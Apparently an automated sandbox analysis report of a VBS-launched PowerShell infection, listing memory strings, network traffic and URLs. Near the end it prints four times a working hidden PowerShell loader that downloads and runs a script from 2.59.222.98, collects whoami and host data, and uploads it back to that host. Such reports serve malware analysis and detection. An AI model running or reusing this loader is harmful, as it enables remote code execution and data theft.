Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT |
Source: global traffic |
HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive |
Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr |
String found in binary or memory: http://2.59.222.98:28402/page107 |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page107Bytestf8.GetBytesesX |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page107X |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820( |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/KfngnHb |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/KfngnHbx |
Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr |
String found in binary or memory: http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt |
Source: powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt |
Source: powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m1 |
Source: svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: qmgr.db.9.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr |
String found in binary or memory: http://x1.i.lencr.org/ |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: edb.log.9.dr, qmgr.db.9.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
Source: svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: qmgr.db.9.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C: |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} |
|